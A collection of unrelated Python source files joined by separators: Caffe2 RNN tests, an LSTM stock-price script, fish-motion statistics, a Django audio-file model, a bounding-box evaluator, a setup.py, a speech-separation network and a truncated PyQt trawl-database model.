output_t = step.net.Mul([input_t, output_t_internal])
step.net.AddExternalOutput(output_t)
self.simple_rnn(T, n, d, model, step, input_t, output_t, output_t_prev,
input_blob, initial_input_blob)
@given(T=st.integers(1, 4),
n=st.integers(1, 5),
d=st.integers(1, 5))
def test_mul(self, T, n, d):
model = ModelHelper(name='external')
input_blob, initial_input_blob = model.net.AddExternalInputs(
'input', 'initial_input')
step = ModelHelper(name='step', param_model=model)
input_t, output_t_prev = step.net.AddExternalInput(
'input_t', 'output_t_prev')
output_t = step.net.Mul([input_t, output_t_prev])
step.net.AddExternalOutput(output_t)
self.simple_rnn(T, n, d, model, step, input_t, output_t, output_t_prev,
input_blob, initial_input_blob)
def simple_rnn(self, T, n, d, model, step, input_t, output_t, output_t_prev,
input_blob, initial_input_blob):
input = np.random.randn(T, n, d).astype(np.float32)
initial_input = np.random.randn(1, n, d).astype(np.float32)
print(locals())
recurrent.recurrent_net(
net=model.net,
cell_net=step.net,
inputs=[(input_t, input_blob)],
initial_cell_inputs=[(output_t_prev, initial_input_blob)],
links={output_t_prev: output_t},
scope="test_rnn_sum_mull",
)
workspace.blobs[input_blob] = input
workspace.blobs[initial_input_blob] = initial_input
op = model.net._net.op[-1]
# Just conviniently store all inputs in an array in the same
# order as op.input
inputs = [workspace.blobs[name] for name in op.input]
def reference(input, initial_input):
global_ws_name = workspace.CurrentWorkspace()
input_all = workspace.blobs[input_blob]
workspace.SwitchWorkspace("ref", create_if_missing=True)
workspace.blobs[input_blob] = input
workspace.blobs[output_t_prev] = initial_input.reshape(n, d)
res_all = np.zeros(shape=input.shape, dtype=np.float32)
for t_cur in range(T):
workspace.blobs[input_t] = input_all[t_cur]
workspace.RunNetOnce(step.net)
result_t = workspace.blobs[output_t]
workspace.blobs[output_t_prev] = result_t
res_all[t_cur] = result_t
workspace.SwitchWorkspace(global_ws_name)
shape = list(input.shape)
shape[0] = 1
return (res_all, res_all[-1].reshape(shape))
self.assertReferenceChecks(
device_option=hu.cpu_do,
op=op,
inputs=inputs,
reference=reference,
output_to_grad=op.output[0],
outputs_to_check=[0, 1],
)
self.assertGradientChecks(
device_option=hu.cpu_do,
op=op,
inputs=inputs,
outputs_to_check=0,
outputs_with_grads=[0],
threshold=0.01,
stepsize=0.005,
)
# Hacky version of 1-D convolution
def _convolution_1d(
self,
model,
inputs,
conv_window,
conv_filter,
conv_bias,
output_name,
left_pad,
):
if left_pad:
padding_width = conv_window - 1
else:
padding_width = 0
# [batch_size, inputs_length, state_size]
inputs_transposed = model.net.Transpose(
inputs,
'inputs_transposed',
axes=[1, 0, 2],
)
# [batch_size, 1, inputs_length, state_size]
inputs_transposed_4d = model.net.ExpandDims(
inputs_transposed,
'inputs_transposed_4d',
dims=[1],
)
# [batch_size, 1, inputs_length - conv_window + 1, state_size]
output_transposed_4d = model.net.Conv(
[inputs_transposed_4d, conv_filter, conv_bias],
output_name + '_transposed_4d',
kernel_h=1,
kernel_w=conv_window,
order='NHWC',
pad_t=0,
pad_l=padding_width,
pad_b=0,
pad_r=0,
)
# [batch_size, inputs_length - conv_window + 1, state_size]
output_transposed = model.net.Squeeze(
output_transposed_4d,
output_name + '_transposed',
dims=[1],
)
# [inputs_length - conv_window + 1, batch_size, state_size]
output = model.net.Transpose(
output_transposed,
output_name,
axes=[1, 0, 2],
)
return output
@given(sequence_length=st.integers(3, 7),
conv_window=st.integers(1, 3),
batch_size=st.integers(1, 5),
state_size=st.integers(1, 5))
def test_stateful_convolution_forward_only(
self,
sequence_length,
conv_window,
batch_size,
state_size,
):
'''
This unit test demonstrates another ways of using RecurrentNetwork.
Imagine, that you want to compute convolution over a sequence,
but sequence elements are not given to you from the beginning,
so you have to loop over the sequence and compute convolution
for each element separately. This situation can occur,
during inference/generation step of the neural networks.
First of all, you have to provide actual input via recurrent states,
since the input of RecurrentNetwork should be known in advance.
Here, we use `fake_inputs` as the input,
and it's used by the op to extract batch size and sequence length.
The actual input sequence is stored in the recurrent state
`input_state`. At every step we generate a new element via input_state_t
(in this example, input_state_t is generated at random, but
in a real situation it can be created using convolution output
from the previous step).
A few important differences from regular RecurrentNetwork usecase:
1. input_state_t_prev is not only a single previous element of
input_state sequence. It is last conv_window elements including (!)
the current one - input_state_t. We specify that using `link_window`
argument of RecurrentNetwork. We need that many elements to
compute a single convolution step. Also, note that `link_window`
specifies how many element to link starting at
`timestep` + `link_offset` position.
2. First few steps might require additional zero padding from the left,
since there is no enough element of input_state sequence are available.
So the initial_state for input_state contains several elements
(exactly how many pads we need for the first step). Also, because of
that all offseting over input_state sequnece is being shifted
by length of initial_input_state: see `link_offset` and `alias_offset`
arguments of RecurrentNetwork.
In this test, we assert that we get the same result
if we apply convolution over all elements simultaneously,
since the whole input_state sequence was generated at the end.
'''
model = ModelHelper(name='model')
fake_inputs = model.param_init_net.UniformFill(
[],
'fake_inputs',
min=-1.0,
max=1.0,
shape=[sequence_length, batch_size, state_size],
)
initial_input_state = model.param_init_net.ConstantFill(
[],
'initial_input_state',
value=0.0,
shape=[conv_window - 1, batch_size, state_size],
)
initial_output_state = model.param_init_net.ConstantFill(
[],
'initial_output_state',
value=0.0,
shape=[1, batch_size, state_size],
)
step_model = ModelHelper(name='step_model', param_model=model)
(
fake_input_t,
timestep,
input_state_t_prev,
) = step_model.net.AddExternalInputs(
'fake_input_t',
'timestep',
'input_state_t_prev',
)
conv_filter = step_model.param_init_net.XavierFill(
[],
'conv_filter',
shape=[state_size, 1, conv_window, state_size],
)
conv_bias = step_model.param_init_net.ConstantFill(
[],
'conv_bias',
shape=[state_size],
value=0.0,
)
step_model.params.extend([conv_filter, conv_bias])
input_state_t = step_model.net.UniformFill(
[],
'input_state_t',
min=-1.0,
max=1.0,
shape=[1, batch_size, state_size],
)
output_state_t = self._convolution_1d(
model=step_model,
inputs=input_state_t_prev,
conv_window=conv_window,
conv_filter=conv_filter,
conv_bias=conv_bias,
output_name='output_state_t',
left_pad=False,
)
initial_recurrent_states = [initial_input_state, initial_output_state]
all_inputs = (
[fake_inputs] + step_model.params + initial_recurrent_states
)
all_outputs = ['input_state_all', 'output_state_all']
recurrent_states = ['input_state', 'output_state']
input_state_all, output_state_all, _ = model.net.RecurrentNetwork(
all_inputs,
all_outputs + ['step_workspaces'],
param=[all_inputs.index(p) for p in step_model.params],
alias_src=recurrent_states,
alias_dst=all_outputs,
alias_offset=[conv_window - 1, 1],
recurrent_states=recurrent_states,
initial_recurrent_state_ids=[
all_inputs.index(s) for s in initial_recurrent_states
],
link_internal=[
str(input_state_t_prev),
str(input_state_t),
str(output_state_t),
],
link_external=['input_state', 'input_state', 'output_state'],
link_offset=[0, conv_window - 1, 1],
link_window=[conv_window, 1, 1],
backward_link_internal=[],
backward_link_external=[],
backward_link_offset=[],
step_net=str(step_model.net.Proto()),
backward_step_net='',
timestep='timestep' if timestep is None else str(timestep),
outputs_with_grads=[],
)
output_states_2 = self._convolution_1d(
model=model,
inputs=input_state_all,
conv_window=conv_window,
conv_filter=conv_filter,
conv_bias=conv_bias,
output_name='output_states_2',
left_pad=True,
)
workspace.RunNetOnce(model.param_init_net)
workspace.RunNetOnce(model.net)
np.testing.assert_almost_equal(
workspace.FetchBlob(output_state_all),
workspace.FetchBlob(output_states_2),
decimal=3,
)
|
# import packages
import pandas as pd
import numpy as np
# to plot within notebook
import matplotlib
matplotlib.use('GTK3Agg')
import matplotlib.pyplot as plt
# importing required libraries
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense, Dropout, LSTM
#
# rcParams['figure.figsize'] = 20,10
# read the file
df = pd.read_csv('NSE-TATAGLOBAL11.csv')
df.head()
#setting index as date
df['Date'] = pd.to_datetime(df.Date,format='%Y-%m-%d')
df.index = df['Date']
#plot
plt.figure(figsize=(16,8))
plt.plot(df['Close'], label='Close Price history')
# creating dataframe
data = df.sort_index(ascending=True, axis=0)
new_data = pd.DataFrame(index=range(0, len(df)), columns=['Date', 'Close'])
for i in range(0, len(data)):
new_data['Date'][i] = data['Date'][i]
new_data['Close'][i] = data['Close'][i]
# setting index
new_data.index = new_data.Date
new_data.drop('Date', axis=1, inplace=True)
# creating train and test sets
dataset = new_data.values
train = dataset[0:987, :]
valid = dataset[987:, :]
# converting dataset into x_train and y_train
scaler = MinMaxScaler(feature_range=(0, 1))
scaled_data = scaler.fit_transform(dataset)
x_train, y_train = [], []
for i in range(60, len(train)):
x_train.append(scaled_data[i-60:i, 0])
y_train.append(scaled_data[i, 0])
x_train, y_train = np.array(x_train), np.array(y_train)
x_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1], 1))
# create and fit the LSTM network
model = Sequential()
model.add(LSTM(units=50, return_sequences=True, input_shape=(x_train.shape[1], 1)))
model.add(LSTM(units=50))
model.add(Dense(1))
model.compile(loss='mean_squared_error', optimizer='adam')
model.fit(x_train, y_train, epochs=1, batch_size=1, verbose=2)
# predicting 246 values, using past 60 from the train data
inputs = new_data[len(new_data) - len(valid) - 60:].values
inputs = inputs.reshape(-1, 1)
inputs = scaler.transform(inputs)
X_test = []
for i in range(60, inputs.shape[0]):
X_test.append(inputs[i-60:i, 0])
X_test = np.array(X_test)
X_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], 1))
closing_price = model.predict(X_test)
closing_price: object = scaler.inverse_transform(closing_price)
# for plotting
train = new_data[:987]
valid = new_data[987:]
print(valid)
valid['Predictions'] = closing_price
plt.plot(train['Close'])
plt.plot(valid[['Close','Predictions']])
plt.show()
|
import os
import argparse
import pandas as pd
import numpy as np
def getStats(x):
"""
Takes an input numpy array and calcualtes the mean, standard deviation, median, min and max values of the array
Input:
x: numpy array
Output:
Reutnrs the mean, std.dev., median, min and max
"""
return np.mean(x), np.std(x), np.median(x), np.min(x), np.max(x)
def getdisplacement(pos):
"""
Takes an numpy array contatining position information, and calculates the displacement
Input:
pos: numpy array containing position information
Output:
diff: numpy array containing displacment information
"""
diff = []
for idx in range(1, pos.shape[0]):
pos1 = pos[idx-1]
pos2 = pos[idx]
diff.append(np.linalg.norm(pos2-pos1))
return np.asarray(diff)
def getSpeed(displacement, deltaT):
"""
Takes an numpy array contatining displacement information, and calculates the speed at a given deltaT
Input:
displacement: numpy array containing position information
deltaT: float indicating the time step
Output:
speed: numpy array containing speed information
"""
speed = []
for idx in range(1, displacement.shape[0]):
disp1 = displacement[idx-1]
disp2 = displacement[idx]
speed.append(np.linalg.norm(disp2-disp1) / deltaT)
return np.asarray(speed)
def getAcceleration(speed, deltaT):
"""
Takes an numpy array contatining speed information, and calculates the acceletation at a given deltaT
Input:
speed: numpy array containing speed information
deltaT: float indicating the time step
Output:
acceleration: numpy array containing acceleration information
"""
acceleration = []
for idx in range(1, speed.shape[0]):
speed1 = speed[idx-1]
speed2 = speed[idx]
acceleration.append(np.linalg.norm(speed2-speed1) / deltaT)
return np.asarray(acceleration)
def analyzeReprojectionError(df):
"""
Collects and computes the combined reprojection error
Input:
df: Pandas Dataframe containing the annotated dataset
Output:
reproj_data: Numpy array containing the combined reprojection error
"""
df["reproj_err"] = df["cam1_reproj_err"] + df["cam2_reproj_err"]
reproj_data = df["reproj_err"].values
reproj_data = reproj_data[np.isfinite(reproj_data)]
return reproj_data
def analyzeMotionCharateristics(df):
"""
Collects and computes the different motion charateristics (displacement, speed, acceleration) from the annotated dataset
Input:
df: Pandas Dataframe containing the annotated dataset
Output:
total_disp: Dict containing the displacement information from all fish ID
total_speed: Dict containing the speed information from all fish ID
total_acc: Dict containing the acceleration information from all fish ID
"""
total_disp = {"3D" : []}
total_speed = {"3D" : []}
total_acc = {"3D" : []}
for ids in df["id"].unique():
tmp_df = df[df["id"] == ids]
world_pos = np.stack((tmp_df["3d_x"], tmp_df["3d_y"], tmp_df["3d_z"]),-1)
world_pos = world_pos[ ~np.isnan(world_pos).any(axis=1)]
coords = {"3D": world_pos}
for key in coords:
pos = coords[key]
disp = getdisplacement(pos)
speed = getSpeed(disp, 1/60)
acc = getAcceleration(speed, 1/60)
total_disp[key].extend(disp)
total_speed[key].extend(speed)
total_acc[key].extend(acc)
return total_disp, total_speed, total_acc
def getDistributionSettings(args):
"""
Calculates the distribution parameters of the reprojetion error and motion charateristics, based on the annotated dataset
"""
rootdir = args["gtPath"]
dirs = {"train": [os.path.join(rootdir, x) for x in ["TRN2", "TRN5"]],
"valid": [os.path.join(rootdir, x) for x in ["VAL2", "VAL5"]],
"test": [os.path.join(rootdir, x) for x in ["TST1", "TST2","TST5", "TST10"]]}
for key in dirs.keys():
disp = []
speed = []
acc = []
reproj = []
for directory in dirs[key]:
gt_directory = os.path.join(directory, "GT")
ann_df = pd.read_csv(os.path.join(gt_directory, "annotations_full.csv"), sep=";")
reproj_data = analyzeReprojectionError(ann_df)
disp_dict, speed_dict, acc_dict = analyzeMotionCharateristics(ann_df)
disp.extend(disp_dict["3D"])
speed.extend(speed_dict["3D"])
acc.extend(acc_dict["3D"])
reproj.extend(reproj_data)
reproj_mean, reproj_std, reproj_median, reproj_min, reproj_max = getStats(reproj)
disp_mean, disp_std, disp_median, disp_min, disp_max = getStats(disp)
speed_mean, speed_std, speed_median, speed_min, speed_max = getStats(speed)
acc_mean, acc_std, acc_median, acc_min, acc_max = getStats(acc)
with open(os.path.join(rootdir, key+"_stats.txt"), "w") as f:
f.write("Reproj Mean: {}\n".format(reproj_mean))
f.write("Reproj Std.Dev: {}\n".format(reproj_std))
f.write("Reproj Median: {}\n".format(reproj_median))
f.write("Reproj Min: {}\n".format(reproj_min))
f.write("Reproj Max: {}\n\n".format(reproj_max))
f.write("Displacement Mean: {}\n".format(disp_mean))
f.write("Displacement Std.Dev: {}\n".format(disp_std))
f.write("Displacement Median: {}\n".format(disp_median))
f.write("Displacement Min: {}\n".format(disp_min))
f.write("Displacement Max: {}\n\n".format(disp_max))
f.write("Speed Mean: {}\n".format(speed_mean))
f.write("Speed Std.Dev: {}\n".format(speed_std))
f.write("Speed Median: {}\n".format(speed_median))
f.write("Speed Min: {}\n".format(speed_min))
f.write("Speed Max: {}\n\n".format(speed_max))
f.write("Acceleration Mean: {}\n".format(acc_mean))
f.write("Acceleration Std.Dev: {}\n".format(acc_std))
f.write("Acceleration Median: {}\n".format(acc_median))
f.write("Acceleration Min: {}\n".format(acc_min))
f.write("Acceleration Max: {}\n\n".format(acc_max))
if __name__ == "__main__":
ap = argparse.ArgumentParser(description = "Calcualtes the distribution parameters for reproejction error and motion charateristics")
ap.add_argument("-gtPath", "--gtPath", type=str, help="Path to the ground truth directory")
args = vars(ap.parse_args())
getDistributionSettings(args) |
#
# django-audiofield License
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Copyright (C) 2011-2014 Star2Billing S.L.
#
# The Initial Developer of the Original Code is
# Arezqui Belaid <[email protected]>
#
from __future__ import unicode_literals
import six
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.conf import settings
from audiofield.fields import AudioField
try:
from django.contrib.auth import get_user_model
User = settings.AUTH_USER_MODEL
except ImportError:
from django.contrib.auth.models import User
@six.python_2_unicode_compatible
class AudioFile(models.Model):
"""
This Model describe the Audio used on the platform,
this allow to upload audio file and configure
alternate Text2Speech System
"""
name = models.CharField(max_length=150, blank=False, verbose_name=_('audio name'),
help_text=_('audio file label'))
audio_file = AudioField(upload_to='upload/audiofiles', blank=True,
ext_whitelist=('.mp3', '.wav', '.ogg'),
verbose_name=_('audio file'))
user = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name=_('user'),
help_text=_('select user'))
created_date = models.DateTimeField(auto_now_add=True)
updated_date = models.DateTimeField(auto_now=True)
class Meta:
permissions = (
('can_view_audiofile', _('can see Audio Files')),
)
db_table = 'audio_file'
verbose_name = _('audio file')
verbose_name_plural = _('audio files')
def __str__(self):
return '[%s] %s' % (self.id, self.name)
def save(self, force_insert=False, force_update=False, using=None, update_fields=None):
# Call the "real" save() method
super(AudioFile, self).save(force_insert, force_update, using, update_fields)
def audio_file_player(self):
"""audio player tag for admin"""
if self.audio_file:
file_url = settings.MEDIA_URL + str(self.audio_file)
player_string = '<audio src="%s" controls>Your browser does not support the audio element.</audio>' % \
(file_url)
return player_string
audio_file_player.allow_tags = True
audio_file_player.short_description = _('audio file player')
|
start_time = time.time()
# Training Set
cd '/mnt/data/shamir/Annotation data set/Original Images/Good Images/Positive Counts/Training Set'
## Decode JSON file and store all the corner coordinates of ground truth in an array
json_data = open('T4_r3p6') # list[z][:-4]
data = json.load(json_data)
brx, tlx, bry, tly = [], [], [], []
for x in range(shape(data["Image_data"]["boundingboxes"][:])[0]):
brx.append(data["Image_data"]["boundingboxes"][x]["corner_bottom_right_x"])
tlx.append(data["Image_data"]["boundingboxes"][x]["corner_top_left_x"])
bry.append(data["Image_data"]["boundingboxes"][x]["corner_bottom_right_y"])
tly.append(data["Image_data"]["boundingboxes"][x]["corner_top_left_y"])
brx = np.array(brx)
bry = np.array(bry)
tly = np.array(tly)
tlx = np.array(tlx)
x,y,x1,y1 = tlx+3, tly+3, brx, bry
# Training Set LCN Labelled
cd '/mnt/data/shamir/Annotation data set/Normalized Images/Good Images/Postive Counts/TrainingSet_LCN_Labelled_1.2'
# Get corner coordinates of the detected bouning boxes (single image)
im = cv2.imread('T4_r3p6.jpg', cv2.CV_LOAD_IMAGE_COLOR)
im_can = cv2.Canny(im, 100, 200)
cnt, hierarchy = cv2.findContours(im_can,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
i = 0
a, b, a1, b1 = [], [], [], []
while i < shape(cnt)[0]:
m,n,w,h = cv2.boundingRect(cnt[i])
m = m+2
n = n+2
w = w+2
h = h+2
a.append(m)
b.append(n)
a1.append(m+w)
b1.append(n+h)
i += 2
a = np.array(a)
b = np.array(b)
a1 = np.array(a1)
b1 = np.array(b1)
# Get all the coordinates of both ground truth (gt) and detected (dt) boxes
x_val, y_val, a_val, b_val = [], [], [], []
# gt
bb_gt_pixels = []
for k in range(shape(x)[0]):
bb_gt_pixels.append([])
for i in range(x[k], x1[k]+1):
for j in range(y[k], y1[k]+1):
x_val.append(i)
y_val.append(j)
x_val = np.array(x_val)
y_val = np.array(y_val)
bb_gt_pixels[k].append(dstack([x_val, y_val]))
x_val, y_val = [], []
bb_gt_pixels = np.array(bb_gt_pixels)
#dt
bb_dt_pixels = []
for k in range(shape(a)[0]):
bb_dt_pixels.append([])
for i in range(a[k], a1[k]+1):
for j in range(b[k], b1[k]+1):
a_val.append(i)
b_val.append(j)
a_val = np.array(a_val)
b_val = np.array(b_val)
bb_dt_pixels[k].append(dstack([a_val, b_val]))
a_val, b_val = [], []
bb_dt_pixels = np.array(bb_dt_pixels)
## Assign numbers to the corresponding Bounding Boxes
#gt
bb_gt_ref = defaultdict(list)
for i in range(shape(bb_gt_pixels)[0]):
for j in range(shape(grid)[0]):
if (bb_gt_pixels[i,0,0][0,0] <= grid_ref.items()[j][1][0][0,0,4799,0]) & (bb_gt_pixels[i,0,0][0,1] <= grid_ref.items()[j][1][0][0,0,4799,1]):
bb_gt_ref[j].append(bb_gt_pixels[i][0][0])
break
#dt
bb_dt_ref = defaultdict(list)
for i in range(shape(bb_dt_pixels)[0]):
for j in range(shape(grid)[0]):
if (bb_dt_pixels[i,0,0][0,0] <= grid_ref.items()[j][1][0][0,0,4799,0]) & (bb_dt_pixels[i,0,0][0,1] <= grid_ref.items()[j][1][0][0,0,4799,1]):
bb_dt_ref[j].append(bb_dt_pixels[i][0][0])
break
## The ultimate evaluation algo #Idea: divide the image into smaller grids and compare bounding boxes in a smaller neighbourhood
ref = []
common_pixels, match, false_pos, false_neg = 0, 0, 0, 0
for k,v in bb_dt_ref.items():
ref.append(k)
ref = np.array(ref)
for k, v in bb_gt_ref.items():
if (ref == k).any() == True:
if (shape(bb_gt_ref.get(k))[0] == 1) & (shape(bb_dt_ref.get(k))[0] == 1):
for m in range(shape(bb_gt_ref.get(k))[1]):
for n in range(shape(bb_dt_ref.get(k))[1]):
if (bb_gt_ref.get(k)[0][m] == bb_dt_ref.get(k)[0][n]).all() == True:
common_pixels += 1
if common_pixels > 0:
all_pixels = shape(bb_gt_ref.get(k))[1] + shape(bb_dt_ref.get(k))[1] - common_pixels # union
match_value = common_pixels / float(all_pixels)
if match_value > 0.5:
match += 1
common_pixels = 0
elif (shape(bb_gt_ref.get(k))[0] == 1) & (shape(bb_dt_ref.get(k))[0] > 1):
for a in range(shape(bb_dt_ref.get(k))[0]):
for m in range(shape(bb_gt_ref.get(k))[1]):
for n in range(shape(bb_dt_ref.get(k)[a])[0]):
if (bb_gt_ref.get(k)[0][m] == bb_dt_ref.get(k)[a][n]).all() == True:
common_pixels += 1
if common_pixels > 0:
all_pixels = shape(bb_gt_ref.get(k))[1] + shape(bb_dt_ref.get(k)[a])[0] - common_pixels
match_value = common_pixels / float(all_pixels)
if match_value > 0.5:
match += 1
common_pixels = 0
elif (shape(bb_gt_ref.get(k))[0] > 1) & (shape(bb_dt_ref.get(k))[0] == 1):
for a in range(shape(bb_gt_ref.get(k))[0]):
for m in range(shape(bb_gt_ref.get(k)[a])[0]):
for n in range(shape(bb_dt_ref.get(k))[1]):
if (bb_gt_ref.get(k)[a][m] == bb_dt_ref.get(k)[0][n]).all() == True:
common_pixels += 1
if common_pixels > 0:
all_pixels = shape(bb_gt_ref.get(k)[a])[0] + shape(bb_dt_ref.get(k))[1] - common_pixels
match_value = common_pixels / float(all_pixels)
if match_value > 0.5:
match += 1
common_pixels = 0
else:
for a in range(shape(bb_gt_ref.get(k))[0]):
for b in range(shape(bb_dt_ref.get(k))[0]):
for m in range(shape(bb_gt_ref.get(k)[a])[0]):
for n in range(shape(bb_dt_ref.get(k)[b])[0]):
if (bb_gt_ref.get(k)[a][m] == bb_dt_ref.get(k)[b][n]).all() == True:
common_pixels += 1
if common_pixels > 0:
all_pixels = shape(bb_gt_ref.get(k)[a])[0] + shape(bb_dt_ref.get(k)[b])[0] - common_pixels
match_value = common_pixels / float(all_pixels)
if match_value > 0.5:
match += 1
common_pixels = 0
false_pos = shape(bb_dt_pixels)[0] - match
false_neg = shape(bb_gt_pixels)[0] - match
print 'match = ', match
print 'false_pos = ', false_pos
print 'false_neg = ', false_neg
print time.time() - start_time, "seconds"
|
from setuptools import find_packages, setup
with open('README.md', 'r') as f:
long_description = f.read()
setup(
name='wids-datathon-2020',
version='0.1.5',
license='MIT',
author='Iain Wong',
author_email='[email protected]',
description='The challenge is to create a model that uses data from the first 24 hours of intensive care to predict patient survival. (Kaggle Proj) https://www.kaggle.com/c/widsdatathon2020/overview',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/iainwo/kaggle/tree/master/wids-datathon-2020',
packages=find_packages(exclude=["*.tests", "*.tests.*", "tests.*", "tests"]),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=[
'pandas',
'python-dotenv',
'Click',
'pyarrow',
'numpy',
'scikit-learn',
],
python_requires='>=3.6',
)
|
# !/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Reference : https://github.com/JusperLee/UtterancePIT-Speech-Separation/blob/master/model.py
"""
import warnings
warnings.filterwarnings('ignore')
import torch
import torch.nn as nn
import numpy as np
from torch.nn.utils.rnn import pad_packed_sequence
class PITNet(nn.Module):
"""
model_type:
0: original pit
1: dvec
2: simple mfcc
3: mfcc + conv
4: conv + mfcc
"""
def __init__(self, n_fft=129, rnn='lstm', num_spks=2, num_layers=3, hidden_size=896, dropout=0.0, non_linear='relu', bidirectional=True, model_type=0, f_dim=0):
super(PITNet, self).__init__()
self.num_spks = num_spks
rnn = rnn.upper()
assert non_linear in ['relu', 'sigmoid', 'tanh'], 'Unsupported non-linear type:{}'.format(non_linear)
assert rnn in ['RNN', 'LSTM', 'GRU'], 'Unsupported rnn type:{}'.format(rnn)
if model_type in [1, 3, 4]:
self.conv = nn.Sequential(
# cnn1
nn.ZeroPad2d((3, 3, 0, 0)),
nn.Conv2d(1, 64, kernel_size=(1, 7), dilation=(1, 1)),
nn.BatchNorm2d(64), nn.ReLU(),
# cnn2
nn.ZeroPad2d((0, 0, 3, 3)),
nn.Conv2d(64, 64, kernel_size=(7, 1), dilation=(1, 1)),
nn.BatchNorm2d(64), nn.ReLU(),
# cnn3
nn.ZeroPad2d(2),
nn.Conv2d(64, 64, kernel_size=(5, 5), dilation=(1, 1)),
nn.BatchNorm2d(64), nn.ReLU(),
# cnn4
nn.ZeroPad2d((2, 2, 4, 4)),
nn.Conv2d(64, 64, kernel_size=(5, 5), dilation=(2, 1)), # (9, 5)
nn.BatchNorm2d(64), nn.ReLU(),
# cnn5
nn.ZeroPad2d((2, 2, 8, 8)),
nn.Conv2d(64, 64, kernel_size=(5, 5), dilation=(4, 1)), # (17, 5)
nn.BatchNorm2d(64), nn.ReLU(),
# cnn6
nn.ZeroPad2d((2, 2, 16, 16)),
nn.Conv2d(64, 64, kernel_size=(5, 5), dilation=(8, 1)), # (33, 5)
nn.BatchNorm2d(64), nn.ReLU(),
# cnn7
nn.ZeroPad2d((2, 2, 32, 32)),
nn.Conv2d(64, 64, kernel_size=(5, 5), dilation=(16, 1)), # (65, 5)
nn.BatchNorm2d(64), nn.ReLU(),
# cnn8
nn.Conv2d(64, 8, kernel_size=(1, 1), dilation=(1, 1)),
nn.BatchNorm2d(8), nn.ReLU(),
)
if model_type == 0:
input_size = n_fft
elif model_type == 1 or model_type == 4:
input_size = n_fft * 8 + f_dim
elif model_type == 2:
input_size = n_fft + f_dim
elif model_type == 3:
input_size = 8 * (n_fft + f_dim)
self.model_type = model_type
self.rnn = getattr(nn, rnn)(input_size, hidden_size, num_layers, batch_first=True, dropout=dropout, bidirectional=bidirectional)
self.rnn.flatten_parameters()
self.dropout = nn.Dropout(dropout)
self.linear = nn.ModuleList([
nn.Linear(hidden_size * 2 if bidirectional else hidden_size, n_fft)
for _ in range(self.num_spks)
])
self.non_linear = {
'relu': nn.functional.relu,
'sigmoid': nn.functional.sigmoid,
'tanh': nn.functional.tanh
}[non_linear]
self.n_fft = n_fft
def forward(self, x, x_feature=None):
if self.model_type == 1:
x = x.unsqueeze(1)
x = self.conv(x)
x = x.transpose(1, 2).contiguous()
x = x.view(x.size(0), x.size(1), -1)
x_feature = x_feature.unsqueeze(1)
x_feature = x_feature.repeat(1, x.size(1), 1)
x = torch.cat((x, x_feature), dim=2)
elif self.model_type == 2:
# print(x.shape, x_feature.shape)
x = torch.cat((x, x_feature), dim=2)
elif self.model_type == 3:
x = torch.cat((x, x_feature), dim=2)
x = x.unsqueeze(1)
x = self.conv(x)
x = x.transpose(1, 2).contiguous()
x = x.view(x.size(0), x.size(1), -1)
elif self.model_type == 4:
x = x.unsqueeze(1)
x = self.conv(x)
x = x.transpose(1, 2).contiguous()
x = x.view(x.size(0), x.size(1), -1)
x = torch.cat((x, x_feature), dim=2)
# batch_size x time x frequency
# -> batch_size x time x hidden_size
x, _ = self.rnn(x)
x = self.dropout(x)
m = []
for linear in self.linear:
# batch_size x time x frequency
y = linear(x)
y = self.non_linear(y)
m.append(y)
return m
def disturb(self, std):
for p in self.parameters():
noise = torch.zeros_like(p).normal_(0, std)
p.data.add_(noise)
if __name__ == "__main__":
x = torch.randn(1, 375, 129)
model = PITNet(model_type = 0)
temp = torch.stack(model.forward(x))
s1, s2 = temp
print(s1.shape)
|
__author__ = 'Todd.Hay'
# -------------------------------------------------------------------------------
# Name: HaulSelection.py
# Purpose:
#
# Author: Todd.Hay
# Email: [email protected]
#
# Created: Jan 11, 2016
# License: MIT
#-------------------------------------------------------------------------------
from PyQt5.QtCore import pyqtProperty, pyqtSignal, pyqtSlot, QObject, QVariant, Qt, QModelIndex, QThread
from PyQt5.Qt import QJSValue, QQmlComponent, QWidget
from PyQt5.QtWidgets import QApplication
from py.common.FramListModel import FramListModel
from datetime import datetime, timedelta
from dateutil import tz, parser
import logging
import unittest
import inspect
import email
from xmlrpc import client as xrc
from py.trawl.TrawlBackdeckDB_model import Settings, Hauls, Catch, Specimen
from peewee import *
from playhouse.shortcuts import model_to_dict, dict_to_model
class OperationListModel(FramListModel):
def __init__(self, app=None, db=None, parent=None):
super().__init__()
self._app = app
self._db = db
self.add_role_name(name="status")
self.add_role_name(name="operationId")
self.add_role_name(name="operationNumber")
self.add_role_name(name="date")
self.add_role_name(name="startTime")
self.add_role_name(name="endTime")
self.add_role_name(name="isTest")
@pyqtSlot()
def add_test_operation(self):
"""
Method to add a test haul to the model + database
:param haul: QJSValue - dictionary contained in a QJSValue object
:return: None
"""
# Add to the Database
sql = "INSERT INTO HAULS('HAUL_NUMBER', 'START_DATETIME', 'END_DATETIME', 'PROCESSING_STATUS', 'IS_TEST') " + \
"VALUES(?, ?, ?, ?, ?);"
now = datetime.now()
date = now.strftime("%m/%d/%Y")
start = now
start_time = start.strftime("%H:%M:%S")
end = (now + timedelta(hours=1))
end_time = end.strftime("%H:%M:%S")
haul_number = "t" + str(round((now - datetime.utcfromtimestamp(0)).total_seconds() * 1000.0))
# Get all Test Hauls - Adjust the last three digits to be 900 and greater so as to not conflict
# with other haul numbers when we print specimen labels where we only keep the last three digits
# of the haul
test_hauls = Hauls.select(fn.substr(Hauls.haul_number, 12, 3).alias('test_haul_number'))\
.where(Hauls.haul_number.contains("t"))\
.order_by(fn.substr(Hauls.haul_number, 12, 3).desc())
# for test_haul in test_hauls:
# logging.info('{0}'.format(test_haul.test_haul_number))
try:
last_test_haul_num = test_hauls.get().test_haul_number
if int(last_test_haul_num) < 900:
haul_last_three = "900"
else:
haul_last_three = str(int(last_test_haul_num) + 1)
except DoesNotExist as dne:
